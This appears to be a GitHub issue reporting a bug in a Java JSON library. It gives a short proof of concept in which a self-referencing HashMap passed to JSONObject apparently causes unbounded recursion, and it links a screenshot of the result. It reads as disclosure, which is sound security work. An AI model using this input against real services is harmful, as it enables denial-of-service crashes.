poc as follow: ``` public class POC { public static void main(String[] args) throws JSONException { HashMap<String,Object> map=new HashMap<>(); map.put("t",map); JSONObject jsonObject=new JSONObject(map); } } ``` and the result: <img width="953" alt="image" src="https://user-images.githubusercontent.com/32029400/200328230-2e1dc144-a183-4ca5-9b5f-eab1acbeb782.png">
poc as follow:
and the result: